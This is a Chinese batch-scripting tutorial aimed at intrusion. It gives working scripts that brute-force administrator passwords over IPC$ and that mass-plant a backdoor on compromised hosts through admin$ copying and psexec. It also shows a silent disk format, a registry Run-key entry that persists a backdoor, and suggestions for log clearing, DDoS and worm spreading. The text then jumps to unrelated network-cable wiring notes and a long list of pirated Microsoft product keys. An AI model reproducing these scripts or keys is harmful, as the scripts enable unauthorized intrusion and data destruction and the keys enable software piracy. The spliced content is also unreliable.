批处理文件是无格式的文本文件，它包含一条或多条命令。它的文件扩展名为 .bat 或 .cmd。在命令提示下键入批处理文件的名称，或者双击该批处理文件，系统就会调用Cmd.exe按照该文件中各个命令出现的顺序来逐个运行它们。使用批处理文件（也被称为批处理程序或脚本），可以简化日常或重复性任务。当然我们的这个版本的主要内容是介绍批处理在入侵中一些实际运用，例如我们后面要提到的用批处理文件来给系统打补丁、批量植入后门程序等。下面就开始我们批处理学习之旅吧。

一.简单批处理内部命令简介
1.Echo 命令
打开回显或关闭请求回显功能，或显示消息。如果没有任何参数，echo 命令将显示当前回显设置。
语法
echo [{ on|off }] [message]
Sample：@echo off / echo hello world
在实际应用中我们会把这条命令和重定向符号（也称为管道符号，一般用> >> ^）结合来实现输入一些命令到特定格式的文件中.这将在以后的例子中体现出来。

2.@ 命令
表示不显示@后面的命令，在入侵过程中（例如使用批处理来格式化敌人的硬盘）自然不能让对方看到你使用的命令啦。
Sample：@echo off
@echo Now initializing the program,please wait a minite...
@format X: /q/u/autoset (format 这个命令是不可以使用/y这个参数的，可喜的是微软留了个autoset这个参数给我们，效果和/y是一样的。)

3.Goto 命令
指定跳转到标签，找到标签后，程序将处理从下一行开始的命令。
语法：goto label （label是参数，指定所要转向的批处理程序中的行。）
Sample：
if { %1 }=={ } goto noparms
if { %2 }=={ } goto noparms（如果这里的if、%1、%2你不明白的话，先跳过去，后面会有详细的解释。）
@Rem check parameters if null show usage
:noparms
echo Usage: monitor.bat ServerIP PortNumber
goto end
标签的名字可以随便起，但是最好是有意义的字母啦，字母前加个：用来表示这个字母是标签，goto命令就是根据这个：来寻找下一步跳到到那里。最好有一些说明这样你别人看起来才会理解你的意图啊。

4.Rem 命令
注释命令，在C语言中相当与/*--------*/,它并不会被执行，只是起一个注释的作用，便于别人阅读和你自己日后修改。
Rem Message
Sample：@Rem Here is the descrīption.

5.Pause 命令
运行 Pause 命令时，将显示下面的消息：
Press any key to continue . . .
Sample：
@echo off
:begin
copy a:*.* d：\\back
echo Please put a new disk into driver A
pause
goto begin
在这个例子中，驱动器 A 中磁盘上的所有文件均复制到d:\\back中。显示的注释提示您将另一张磁盘放入驱动器 A 时，pause 命令会使程序挂起，以便您更换磁盘，然后按任意键继续处理。

6.Call 命令
从一个批处理程序调用另一个批处理程序，并且不终止父批处理程序。call 命令接受用作调用目标的标签。如果在脚本或批处理文件外使用 Call，它将不会在命令行起作用。
语法
call [[Drive:][Path] FileName [BatchParameters]] [:label [arguments]]
参数
[Drive: }[Path] FileName
指定要调用的批处理程序的位置和名称。filename 参数必须具有 .bat 或 .cmd 扩展名。

7.start 命令
调用外部程序，所有的DOS命令和命令行程序都可以由start命令来调用。
入侵常用参数：
MIN 开始时窗口最小化
SEPARATE 在分开的空间内开始 16 位 Windows 程序
HIGH 在 HIGH 优先级类别开始应用程序
REALTIME 在 REALTIME 优先级类别开始应用程序
WAIT 启动应用程序并等候它结束
parameters 这些为传送到命令/程序的参数
执行的应用程序是 32-位 GUI 应用程序时，CMD.EXE 不等应用程序终止就返回命令提示。如果在命令脚本内执行，该新行为则不会发生。
8.choice 命令
choice 使用此命令可以让用户输入一个字符，从而运行不同的命令。使用时应该加/c:参数，c:后应写提示可输入的字符，之间无空格。它的返回码为1234……
如: choice /c:dme defrag,mem,end
将显示
defrag,mem,end[D,M,E]?
Sample：
Sample.bat的内容如下:
@echo off
choice /c:dme defrag,mem,end
if errorlevel 3 goto defrag （应先判断数值最高的错误码）
if errorlevel 2 goto mem
if errotlevel 1 goto end

:defrag
c:\\dos\\defrag
goto end
:mem
mem
goto end
:end
echo good bye

此文件运行后，将显示 defrag,mem,end[D,M,E]? 用户可选择d m e ，然后if语句将作出判断，d表示执行标号为defrag的程序段，m表示执行标号为mem的程序段，e表示执行标号为end的程序段，每个程序段最后都以goto end将程序跳到end标号处，然后程序将显示good bye，文件结束。

9.If 命令

if 表示将判断是否符合规定的条件，从而决定执行不同的命令。 有三种格式:
1、if "参数" == "字符串" 待执行的命令
参数如果等于指定的字符串，则条件成立，运行命令，否则运行下一句。(注意是两个等号）
如if "%1"=="a" format a:
if { %1 }=={ } goto noparms
if { %2 }=={ } goto noparms

2、if exist 文件名 待执行的命令
如果有指定的文件，则条件成立，运行命令，否则运行下一句。
如if exist config.sys edit config.sys

3、if errorlevel / if not errorlevel 数字 待执行的命令
如果返回码等于指定的数字，则条件成立，运行命令，否则运行下一句。
如if errorlevel 2 goto x2
DOS程序运行时都会返回一个数字给DOS，称为错误码errorlevel或称返回码，常见的返回码为0、1。

10.for 命令
for 命令是一个比较复杂的命令，主要用于参数在指定的范围内循环执行命令。
在批处理文件中使用 FOR 命令时，指定变量请使用 %%variable

for { %variable|%%variable } in (set) do command [ CommandLineOptions]
%variable 指定一个单一字母可替换的参数。
(set) 指定一个或一组文件。可以使用通配符。
command 指定对每个文件执行的命令。
command-parameters 为特定命令指定参数或命令行开关。
在批处理文件中使用 FOR 命令时，指定变量请使用 %%variable
而不要用 %variable。变量名称是区分大小写的，所以 %i 不同于 %I

如果命令扩展名被启用，下列额外的 FOR 命令格式会受到
支持:

FOR /D %variable IN (set) DO command [command-parameters]

如果集中包含通配符，则指定与目录名匹配，而不与文件
名匹配。

FOR /R [[drive:]path] %variable IN (set) DO command [command-

检查以 [drive:]path 为根的目录树，指向每个目录中的
FOR 语句。如果在 /R 后没有指定目录，则使用当前
目录。如果集仅为一个单点(.)字符，则枚举该目录树。

FOR /L %variable IN (start,step,end) DO command [command-para

该集表示以增量形式从开始到结束的一个数字序列。
因此，(1,1,5) 将产生序列 1 2 3 4 5，(5,-1,1) 将产生
序列 (5 4 3 2 1)。

FOR /F ["options"] %variable IN (file-set) DO command
FOR /F ["options"] %variable IN ("string") DO command
FOR /F ["options"] %variable IN (\'command\') DO command

或者，如果有 usebackq 选项:

FOR /F ["options"] %variable IN (file-set) DO command
FOR /F ["options"] %variable IN ("string") DO command
FOR /F ["options"] %variable IN (\'command\') DO command

filenameset 为一个或多个文件名。继续到 filenameset 中的
下一个文件之前，每份文件都已被打开、读取并经过处理。
处理包括读取文件，将其分成一行行的文字，然后将每行
解析成零或更多的符号。然后用已找到的符号字符串变量值
调用 For 循环。以默认方式，/F 通过每个文件的每一行中分开
的第一个空白符号。跳过空白行。您可通过指定可选 "options"
参数替代默认解析操作。这个带引号的字符串包括一个或多个
指定不同解析选项的关键字。这些关键字为:

eol=c - 指一个行注释字符的结尾(就一个)
skip=n - 指在文件开始时忽略的行数。
delims=xxx - 指分隔符集。这个替换了空格和跳格键的
默认分隔符集。
tokens=x,y,m-n - 指每行的哪一个符号被传递到每个迭代
的 for 本身。这会导致额外变量名称的
格式为一个范围。通过 nth 符号指定 m
符号字符串中的最后一个字符星号，
那么额外的变量将在最后一个符号解析之
分配并接受行的保留文本。
usebackq - 指定新语法已在下类情况中使用:
在作为命令执行一个后引号的字符串并且
引号字符为文字字符串命令并允许在 fi
中使用双引号扩起文件名称。

sample1:
FOR /F "eol=; tokens=2,3* delims=, " %i in (myfile.txt) do command

会分析 myfile.txt 中的每一行，忽略以分号打头的那些行，将
每行中的第二个和第三个符号传递给 for 程序体；用逗号和/或
空格定界符号。请注意，这个 for 程序体的语句引用 %i 来
取得第二个符号，引用 %j 来取得第三个符号，引用 %k
来取得第三个符号后的所有剩余符号。对于带有空格的文件
名，您需要用双引号将文件名括起来。为了用这种方式来使
用双引号，您还需要使用 usebackq 选项，否则，双引号会
被理解成是用作定义某个要分析的字符串的。

%i 专门在 for 语句中得到说明，%j 和 %k 是通过
tokens= 选项专门得到说明的。您可以通过 tokens= 一行
指定最多 26 个符号，只要不试图说明一个高于字母 \'z\' 或
\'Z\' 的变量。请记住，FOR 变量是单一字母、分大小写和全局的；
同时不能有 52 个以上都在使用中。

您还可以在相邻字符串上使用 FOR /F 分析逻辑；方法是，
用单引号将括号之间的 filenameset 括起来。这样，该字符
串会被当作一个文件中的一个单一输入行。

最后，您可以用 FOR /F 命令来分析命令的输出。方法是，将
括号之间的 filenameset 变成一个反括字符串。该字符串会
被当作命令行，传递到一个子 CMD.EXE，其输出会被抓进
内存，并被当作文件分析。因此，以下例子:

FOR /F "usebackq delims==" %i IN (`set`) DO @echo %i

会枚举当前环境中的环境变量名称。

另外，FOR 变量参照的替换已被增强。您现在可以使用下列
选项语法:

~I - 删除任何引号(")，扩充 %I
%~fI - 将 %I 扩充到一个完全合格的路径名
%~dI - 仅将 %I 扩充到一个驱动器号
%~pI - 仅将 %I 扩充到一个路径
%~nI - 仅将 %I 扩充到一个文件名
%~xI - 仅将 %I 扩充到一个文件扩展名
%~sI - 扩充的路径只含有短名
%~aI - 将 %I 扩充到文件的文件属性
%~tI - 将 %I 扩充到文件的日期/时间
%~zI - 将 %I 扩充到文件的大小
%~$PATH:I - 查找列在路径环境变量的目录，并将 %I 扩充
到找到的第一个完全合格的名称。如果环境变量
未被定义，或者没有找到文件，此组合键会扩充
空字符串

可以组合修饰符来得到多重结果:

%~dpI - 仅将 %I 扩充到一个驱动器号和路径
%~nxI - 仅将 %I 扩充到一个文件名和扩展名
%~fsI - 仅将 %I 扩充到一个带有短名的完整路径名
%~dp$PATH:i - 查找列在路径环境变量的目录，并将 %I 扩充
到找到的第一个驱动器号和路径。
%~ftzaI - 将 %I 扩充到类似输出线路的 DIR

在以上例子中，%I 和 PATH 可用其他有效数值代替。%~ 语法
用一个有效的 FOR 变量名终止。选取类似 %I 的大写变量名
比较易读，而且避免与不分大小写的组合键混淆。

以上是MS的官方帮助，下面我们举几个例子来具体说明一下For命令在入侵中的用途。

sample2：

利用For命令来实现对一台目标Win2k主机的暴力密码破解。
我们用net use \\\\ip\\ipc$ "password" /u:"administrator"来尝试这和目标主机进行连接，当成功时记下密码。
最主要的命令是一条：for /f i% in (dict.txt) do net use \\\\ip\\ipc$ "i%" /u:"administrator"
用i%来表示admin的密码，在dict.txt中这个取i%的值用net use 命令来连接。然后将程序运行结果传递给find命令－－
for /f i%% in (dict.txt) do net use \\\\ip\\ipc$ "i%%" /u:"administrator"|find ":命令成功完成">>D:\\ok.txt ，这样就ko了。

sample3：

你有没有过手里有大量肉鸡等着你去种后门＋木马呢？，当数量特别多的时候，原本很开心的一件事都会变得很郁闷：）。文章开头就谈到使用批处理文件，可以简化日常或重复性任务。那么如何实现呢？呵呵，看下去你就会明白了。

主要命令也只有一条：（在批处理文件中使用 FOR 命令时，指定变量使用 %%variable）
@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call door.bat %%i %%j %%k
tokens的用法请参见上面的sample1，在这里它表示按顺序将victim.txt中的内容传递给door.bat中的参数%i %j %k。
而cultivate.bat无非就是用net use命令来建立IPC$连接，并copy木马＋后门到victim，然后用返回码（If errorlever =）来筛选成功种植后门的主机，并echo出来，或者echo到指定的文件。
delims= 表示vivtim.txt中的内容是一空格来分隔的。我想看到这里你也一定明白这victim.txt里的内容是什么样的了。应该根据%%i %%j %%k表示的对象来排列，一般就是 ip password username。
代码雏形：
--------------- cut here then save as a batchfile(I call it main.bat ) ---------------------------
@echo off
@if "%1"=="" goto usage
@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call IPChack.bat %%i %%j %%k
@goto end
:usage
@echo run this batch in dos modle.or just double-click it.
:end
--------------- cut here then save as a batchfile(I call it main.bat ) ---------------------------

------------------- cut here then save as a batchfile(I call it door.bat) -----------------------------
@net use \\\\%1\\ipc$ %3 /u:"%2"
@if errorlevel 1 goto failed
@echo Trying to establish the IPC$ connection …………OK
@copy windrv32.exe\\\\%1\\admin$\\system32 && if not errorlevel 1 echo IP %1 USER %2 PWD %3 >>ko.txt
@psexec \\\\%1 c:\\winnt\\system32\\windrv32.exe
@psexec \\\\%1 net start windrv32 && if not errorlevel 1 echo %1 Backdoored >>ko.txt
:failed
@echo Sorry can not connected to the victim.
----------------- cut here then save as a batchfile(I call it door.bat) --------------------------------
这只是一个自动种植后门批处理的雏形，两个批处理和后门程序（Windrv32.exe）,PSexec.exe需放在统一目录下.批处理内容
尚可扩展,例如:加入清除日志+DDOS的功能,加入定时添加用户的功能,更深入一点可以使之具备自动传播功能(蠕虫).此处不多做叙述,有兴趣的朋友可自行研究.

二.如何在批处理文件中使用参数
批处理中可以使用参数，一般从1%到 9%这九个，当有多个参数时需要用shift来移动，这种情况并不多见，我们就不考虑它了。
sample1：fomat.bat
@echo off
if "%1"=="a" format a:
:format
@format a:/q/u/auotset
@echo please insert another disk to driver A.
@pause
@goto fomat
这个例子用于连续地格式化几张软盘，所以用的时候需在dos窗口输入fomat.bat a，呵呵,好像有点画蛇添足了～^_^
sample2：
当我们要建立一个IPC$连接地时候总要输入一大串命令，弄不好就打错了，所以我们不如把一些固定命令写入一个批处理，把肉鸡地ip password username 当着参数来赋给这个批处理，这样就不用每次都打命令了。
@echo off
@net use \\\\1%\\ipc$ "2%" /u:"3%" 注意哦，这里PASSWORD是第二个参数。
@if errorlevel 1 echo connection failed
怎么样,使用参数还是比较简单的吧？你这么帅一定学会了^_^.No.3
三.如何使用组合命令(Compound Command)

1.&

Usage：第一条命令 & 第二条命令 [& 第三条命令...]

用这种方法可以同时执行多条命令，而不管命令是否执行成功

Sample：
C:\\>dir z: & dir c:\\Ex4rch
The system cannot find the path specified.
Volume in drive C has no label.
Volume Serial Number is 0078-59FB

Directory of c:\\Ex4rch

2002-05-14 23:51 <DIR> .
2002-05-14 23:51 <DIR> ..
2002-05-14 23:51 14 sometips.gif

2.&&

Usage：第一条命令 && 第二条命令 [&& 第三条命令...]

用这种方法可以同时执行多条命令，当碰到执行出错的命令后将不执行后面的命令，如果一直没有出错则一直执行完所有命令；

Sample：
C:\\>dir z: && dir c:\\Ex4rch
The system cannot find the path specified.

C:\\>dir c:\\Ex4rch && dir z:
Volume in drive C has no label.
Volume Serial Number is 0078-59FB

Directory of c:\\Ex4rch

2002-05-14 23:55 <DIR> .
2002-05-14 23:55 <DIR> ..
2002-05-14 23:55 14 sometips.gif
1 File(s) 14 bytes
2 Dir(s) 768,671,744 bytes free
The system cannot find the path specified.

在做备份的时候可能会用到这种命令会比较简单，如：
dir file://192.168.0.1/database/backup.mdb && copy file://192.168.0.1/database/backup.mdb E:\\backup
如果远程服务器上存在backup.mdb文件，就执行copy命令，若不存在该文件则不执行copy命令。这种用法可以替换IF exist了 ：）

3.||

Usage：第一条命令 || 第二条命令 [|| 第三条命令...]

用这种方法可以同时执行多条命令，当碰到执行正确的命令后将不执行后面的命令，如果没有出现正确的命令则一直执行完所有命令；

Sample：
C:\\Ex4rch>dir sometips.gif || del sometips.gif
Volume in drive C has no label.
Volume Serial Number is 0078-59FB

Directory of C:\\Ex4rch

2002-05-14 23:55 14 sometips.gif
1 File(s) 14 bytes
0 Dir(s) 768,696,320 bytes free

组合命令使用的例子：
sample：
@copy trojan.exe \\\\%1\\admin$\\system32 && if not errorlevel 1 echo IP %1 USER %2 PASS %3 >>victim.txt

四、管道命令的使用

1.| 命令
Usage：第一条命令 | 第二条命令 [| 第三条命令...]
将第一条命令的结果作为第二条命令的参数来使用，记得在unix中这种方式很常见。

sample：
time /t>>D:\\IP.log
netstat -n -p tcp|find ":3389">>D:\\IP.log
start Explorer
看出来了么？用于终端服务允许我们为用户自定义起始的程序，来实现让用户运行下面这个bat，以获得登录用户的IP。

2.>、>>输出重定向命令
将一条命令或某个程序输出结果的重定向到特定文件中, > 与 >>的区别在于，>会清除调原有文件中的内容后写入指定文件，而>>只会追加内容到指定文件中，而不会改动其中的内容。

sample1：
echo hello world>c:\\hello.txt (stupid example?)

sample2:
时下DLL木马盛行，我们知道system32是个捉迷藏的好地方，许多木马都削尖了脑袋往那里钻，DLL马也不例外，针对这一点我们可以在安装好系统和必要的应用程序后，对该目录下的EXE和DLL文件作一个记录：
运行CMD--转换目录到system32--dir *.exe>exeback.txt & dir *.dll>dllback.txt,
这样所有的EXE和DLL文件的名称都被分别记录到exeback.txt和dllback.txt中,
日后如发现异常但用传统的方法查不出问题时,则要考虑是不是系统中已经潜入DLL木马了.
这时我们用同样的命令将system32下的EXE和DLL文件记录到另外的exeback1.txt和dllback1.txt中,然后运行:
CMD--fc exeback.txt exeback1.txt>diff.txt & fc dllback.txt dllback1.txt>diff.txt.(用FC命令比较前后两次的DLL和EXE文件,并将结果输入到diff.txt中),这样我们就能发现一些多出来的DLL和EXE文件,然后通过查看创建时间、版本、是否经过压缩等就能够比较容易地判断出是不是已经被DLL木马光顾了。没有是最好，如果有的话也不要直接DEL掉，先用regsvr32 /u trojan.dll将后门DLL文件注销掉,再把它移到回收站里，若系统没有异常反映再将之彻底删除或者提交给杀毒软件公司。

3.< 、>& 、<&
< 从文件中而不是从键盘中读入命令输入。
>& 将一个句柄的输出写入到另一个句柄的输入中。
<& 从一个句柄读取输入并将其写入到另一个句柄输出中。
这些并不常用，也就不多做介绍。

No.5
五.如何用批处理文件来操作注册表

在入侵过程中经常回操作注册表的特定的键值来实现一定的目的，例如:为了达到隐藏后门、木马程序而删除Run下残余的键值。或者创建一个服务用以加载后门。当然我们也会修改注册表来加固系统或者改变系统的某个属性，这些都需要我们对注册表操作有一定的了解。下面我们就先学习一下如何使用.REG文件来操作注册表.(我们可以用批处理来生成一个REG文件)
关于注册表的操作，常见的是创建、修改、删除。

1.创建
创建分为两种，一种是创建子项(Subkey)

我们创建一个文件，内容如下：

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\hacker]

然后执行该脚本，你就已经在HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft下创建了一个名字为“hacker”的子项。

另一种是创建一个项目名称
那这种文件格式就是典型的文件格式，和你从注册表中导出的文件格式一致，内容如下：

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run]
"Invader"="Ex4rch"
"Door"=C:\\\\WINNT\\\\system32\\\\door.exe
"Autodos"=dword:02

这样就在[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run]下
新建了:Invader、door、about这三个项目
Invader的类型是“String Value”
door的类型是“REG SZ Value”
Autodos的类型是“DWORD Value”

2.修改
修改相对来说比较简单，只要把你需要修改的项目导出，然后用记事本进行修改，然后导入（regedit /s）即可。

3.删除
我们首先来说说删除一个项目名称，我们创建一个如下的文件：

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run]
"Ex4rch"=-

执行该脚本，[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run]下的"Ex4rch"就被删除了；

做水晶头有两种国际标准：EIA-568A和EIA-568B标准

EIA-568A标准：白绿、绿、白橙、蓝、白蓝、橙、白棕、棕

EIA-568B标准:白橙、橙、白绿、蓝、白蓝、绿、白棕、棕
=======================================================
直接连线：就是网线的两头都用一个国际标准。

它适应于：交换机（或集线器）UPLINK    和     交换机（集线器）普通端口  之间的连接
            
          交换机（集线器）普通端口    和    计算机（终端）网卡   之间的连接

交叉连接：就是网线的两头用不同的国际标准。

适用于：  计算机（终端）网卡 <-------->  计算机（终端）网卡   之间的连接

          交换机（集线器）普通端口   <------->   交换机（集线器）普通端口  之间的连接

WindowsXP可以无限次激活的号码:CXGDD-GP2B2-RKWWD-HG3HY-VDJ7J或者RK7J8-2PGYQ-P47VV-V6PMB-F6XPQ
　　WindowsXP 2520 Pro 英文版－－60天免激活序列号：RK7J8-2PGYQ-P47VV-V6PMB-F6XPQ
　　Windows XP 2505 RC1－－序列号：DTWB2-VX8WY-FG8R3-X696T-66Y46 Q3R8Y-MP9KD-3M6KB-383YB-7PK9Q 411Y0-URB45-34R3B-310N6-70U51 F0R6R-347JU-57IC3-M0V34-11Z16 50M38-0DY53-7UPU5-7H380-M8111
　　WindowXP(windows whistler) Beta2 build 2428－－CD Key: RBDC9-VTRC8-D7972-J97JY-PRVMG
　　Windows Mellinium(Windows Me)简体中文最终正式版－－s/n: B6BYC-6T7C3-4PXRW-2XKWB-GYV33
　　Windows2000 Professional 中文版－－SN：PQHKR-G4JFW-VTY3P-G4WQ2-88CTW
　　Windows2000 Professional英文正式版－－s/n: RBDC9-VTRC8-D7972-J97JY-PRVMG
　　Windows2000 Server 简体中文完全正式版－－S/N:XF7DK-7X2WM-2QRCT-Y9R23-4BHDG
　　Windows2000 Server－－CD-KEY:H6TWQ-TQQM8-HXJYG-D69F7-R84VM
　　Windows 98 SE 标准正式版－－s/n: HMTWJ-VPPWP-9BXP8-WD73Y-GGT6M
　　Windows98序列号－－K4HVD-Q9TJ9-6CRX9-C9G68-RQ2D3
　　Microsoft FrontPage 2000 SR-1A V9.0X 中文(简体)完整正式版 S/N：GC6J3-GTQ62-FP876-94FBR-D3DX8
　　Microsoft FrontPage 2000 SR-1A V9.0X 中文完整正式版 S/N：GC6J3-GTQ62-FP876-94FBR-D3DX8
　　Microsoft Office 2000 DEVELOPER V9.0 SR1(A) 中文旗舰程式开发完整正式版 S/N：GC6J3-GTQ62-FP876-94FBR-D3DX8
　　Microsoft Office 2000 Premium V9.0 SR-1 日文完整企业正式版 S/N：GC6J3-GTQ62-FP876-94FBR-D3DX8 OFFICE 2000 Server Extension S/N:4678-0000502
　　Microsoft Office 2000 S/N：gc6j3-gtq62-fp876-94fbr-d3dx8
　　Microsoft Office 2000 Server Extension S/N：4678-0000502
　　Microsoft Office 2000 Sr1 中文企业版 5CD S/N：KY7XV-6PF6K-FQDGJ-4PYQY-QDFYM s/n：Q3PX2-T7Y8Q-8X2VR-PQCTP-YQCYQ S/N：H3X78-Q23HJ-TGT6Q-DK2H4-T2BQ8
　　Microsoft Office 2000 STANDARD V9.0 SR-1 日文完整标准正式版 S/N：GC6J3-GTQ62-FP876-94FBR-D3DX8
　　Microsoft Office 2000 STANDARD V9.0 SR1(A) S/N：GC6J3-GTQ62-FP876-94FBR-D3DX8
　　Microsoft Office 2000 中文企业版 S/N：GC6J3-GTQ62-FP876-94FBR-D3DX8
　　Microsoft Office 2000 简体版系列 S/N：GJ627-VB478-VJX8D-CFQGK-JHPG8
　　Microsoft Office 2000【3片装】S/N：GJV8J-DRRCG-MVTRJ-G33HM-8BCVM
　　Microsoft Office 2001 for Mac Japanese 日文光碟完整正式版 S/N：545-465-4655
　　Microsoft Office 2001 For Mac 完整正式版 S/N：545-465-4655
　　Microsoft Office 97 日文版 S/N：2601-6686117
　　Microsoft Outlook 2000 V9.0 SR-1A 中文完整正式版 S/N：GC6J3-GTQ62-FP876-94FBR-D3DX8
　　Microsoft PhotoDraw 2000 中文正式版 S/N：111-1111111
　　Microsoft PhotoDraw 2000 日文正式版 S/N：KBTP4-2KJ29-BPWV4-HM6M8-MDJYT
　　Microsoft PhotoDraw 2000 第二版 中文版 S/N：KBTP4-2KJ29-BPWV4-HM6M8-MDJYT
　　Microsoft PhotoDraw 2000 第二版 日文专业完整正式版 S/N：KBTP4-2KJ29-BPWV4-HM6M8-MDJYT OFFICE 2000 Server Extension S/N:4678-0000502
　　Microsoft PROJECT 2000 中文完整正式版 S/N：DT3FT-BFH4M-GYYH8-PG9C3-8K2FJ
　　Microsoft PROJECT 2000 中文版 S/N：GC6J3-GTQ62-FP876-94FBR-D3DX8
　　Microsoft PROJECT 2000 日文完整正式版 S/N：DT3FT-BFH4M-GYYH8-PG9C3-8K2FJ
　　Microsoft PROJECT 2000 简体中文完整正式版 S/N：DT3FT-BFH4M-GYYH8-PG9C3-8K2FJ
　　Microsoft SQL Server 2000 中文企业版 S/N：JCYFH-BYJMR-C4PVV-VD9G3-VXDYG
Microsoft visio 2000 V6.0X ENTERPRISE SR-1 中文顶级企业 SR1 完整正式版 S/N：123165-500133
　　Microsoft visio 2000 V6.0X Professional Edition 日文专业完整正式版 S/N：60903-111111
　　Microsoft visio 2000 V6.0X Professional SR-1 中文专业 SR1 完整正式版 S/N：60900-111111 or S/N：123035-111111
　　Microsoft visio 2000 V6.0X Technical SR-1 Edtion 中文工程 SR1 完整正式版 S/N：123165-500133

 

 

比尔．盖茨哭了——微软全部序列号

　　Microsoft Visual Basic V5.0 中文版 S/N：0001-0000000
　　Microsoft Visual Foxpro V5.0 S/N：0001-0000000
　　Microsoft Visual Studio V6.0 企业完整正式版【6片装】S/N：442-1087991
　　Microsoft Whistler Professional Beta 2 2462繁体中文版 S/N：QB2BW-8PJ2D-9X7JK-BCCRT-D233Y
　　Microsoft Windows 2000 ADVANCED SERVER WITH SP1 中文完整正式版 CD-KEY：H6TWQ-TQQM8-HXJYG-D69F7-R84VM
　　Microsoft Windows 2000 ADVANCED SERVER 日文贩售完整正式版 S/N：RM233-2PRQQ-FR4RH-JP89H-46QYB
　　Microsoft Windows 2000 Professional Debug/Checked Build With Service Pack 1 多国语系完整正式版 S/N：DDTPV-TXMX7-BBGJ9-WGY8K-B9GH
　　Microsoft Windows 2000 PROFESSIONAL 中文专业正式版 S/N：F6PGG-4YYDJ-3FF3T-R328P-3BXTG伺服机版 JVJDR-KY99G-B8J4C-MKJ69-P8QG3
　　Microsoft Windows 2000 PROFESSIONAL 中文专业正式版 S/N：XFD2W-W7VH8-MVC47-KY7DQ-P8Y4J
　　Microsoft Windows 2000 PROFESSIONAL 日文贩售专业完整正式版 S/N：RM233-2PRQQ-FR4RH-JP89H-46QYB
　　Microsoft Windows 2000 SERVER WITH SP1 中文完整正式版 S/N：H6TWQ-TQQM8-HXJYG-D69F7-R84VM
　　Microsoft Windows 2000 SERVER 中文版 S/N：H6TWQ-TQQM8-HXJYG-D69F7-R84VM~JVJDR-KY99G-B8J4C-MKJ69-P8QG3~XFD2W-W7VH8-MVC47-KY7DQ-P8Y4J
　　Microsoft Windows 95 OSR2 2.1 中文正式版 CD-KEY：09297-OEM-0021245-57958
　　Microsoft Windows 98 Second Edition 第二版 S/N：WHWGP-XDR8Y-GR9X3-863RP-67J2T
　　Microsoft Windows ME (Millennium Edition) 中文完整正式版 S/N：TCYV8-G6Q2T-R9BHD-BR8VM-J4B36 or S/N：J7C6X-QC2BH-GGX24-7FQG7-2K398 or S/N：B6BYC-6T7C3-4PXRW-2XKWB-GYV33
　　Microsoft Windows ME (Millennium Edition) 日文正式版 S/N：TCJC7-H2QDH-3T7G7-R6RTM-YRK3Y
　　Microsoft Windows ME (Millennium Edition) 英文升级贩售完整正式版 S/N：HBTD9-6P338-XT2MV-QBTTF-WPGGB
　　Microsoft Windows ME/WIN 98/WIN 98 SP1/WIN 98 SE 4合1中文(繁体)正式 S/N：J7C6X-QC2BH-GGX24-7FQG7-2K398
　　Microsoft Windows Millennium B2 V4.90.2438 98 第三版中文完整测试版 S/N：RBDC9-VTRC8-D7972-J97JY-PRVMG
　　Microsoft Windows Millennium Edition OEM 98 第三版中文完整版 S/N：B6BYC-6T7C3-4PXRW-2XKWB-GYV33
　　Microsoft Windows Millennium V4.90.3000 简体体中文正式零售版 S/N：K9KDJ-3XPXY-92WFW-9Q26K-MVRK8
　　Microsoft Windows Millennium 标准版 S/N：J7C6X-QC2BH-GGX24-7FQG7-2K398 随机版 S/N：WRK9F-68JJR-JBFD8-F8KPM-WCK7T RTM版 S/N：B6BYC-6T7C3-4PXRW-2XKWB-GYV33
　　Microsoft Windows Whistler Pro CD-Key：F6PGG-4YYDJ-3FF3T-R328P-3BXTG
　　Windows Small Business Server 2003 CD-KEY:BBGC6-TXDG9-J9CDW-JXK3R-GTMMB
　　PROJECT Server 2003 CD-KEY：DY6WQ-D3FYG-V89BY-8KPG9-8YW9M
　　Office Pro 2003 CD-KEY:GWH28-DGCMP-P6RC4-6J4MT-3HFDY
　　SHAPEPOINT PORTAL SERVER V2003 cdkey:BBH2G-D2VK9-QD4M9-F63XB-43C33
　　Visio 2003,OneNote 2003,Project 2003,OFFICE11-Outlook2003
　　CD-KEY:WFDWY-XQXJF-RHRYG-BG7RQ-BBDHM
　　win2003 Enterprise Server CD-KEYW32K-48T2T-3D2PJ-DXBWY-C6WRJ
　　win2003 Standard Server CD-KEY:M6RJ9-TBJH3-9DDXM-4VX9Q-K8M8M
　　win2003 Web Server CD-KEY: D42X8-7MWXD-M4B76-MKYP7-CW9FD
　　
　　你的Winxp是不是原版，一看就知：
　　在i386文件夹里有一个eula.txt，最后有一行EULAID，就是你的版本
　　OEM:WX.2_PRO_OEM_TW(or.WX.2_PRE_OEM_TW)
　　执行:WX.2_PRO_RVL_TW(or.WX.2_PRE_RAL_TW)
　　RTL.:WX.4_PRO_RTL_TW
　　中文正式版的版本是
　　EULAID:WX.4_PRO_RTL_CN
　　1.如果是WX.开头是正式版，WB.开头是测试版。
　　
　　2.如果有_PRE，是家庭版，_PRO是专业版。
　　
　　3._OEM,_RVL都是需要启动版，_RTL有免启动金钥，就可免启动。
　　
　　4.光碟标签并无意义，是制作光盘的人自己加加进去的。
　　
　　5.OEM.版的说明，中文版应是一半中文一半英文，如果全是英文，那就是来自英文的Corporate版(破解)
　　
　　6.执行(RVL)版的说明全是中文。
　　
　　7、winxp原版的文件都是2001-9-5 12：00，如果有一个不是，那么！特别是i386＼eula.txt这个文件。
　　
　　8、CD.Label是WXPFPP_EN(英文)，WXPFPP.cn(中文)
　　
　　9、还有其它一堆.OEM免激活、免激活正式版等等的，这些都是.利用.OEM、2600Fre.这些版本＋Corpfiles.破解，再烧成可开机光盘的，看它们的CD.Label更是五花八门。

　　10、目前看到免激活版都是某中文版＋英文Corpfiles.做成免激活「Home.Made」企业版(或称大量授权版本)，看安装序号便知：FCKGW-RHQQ2-YXRKT-8TG6W-2B7Q8。所以如果你有OEM＋Corpfiles.版或是RVL@TW版的话，那就不用急着下载其它版本，看看就好。
　
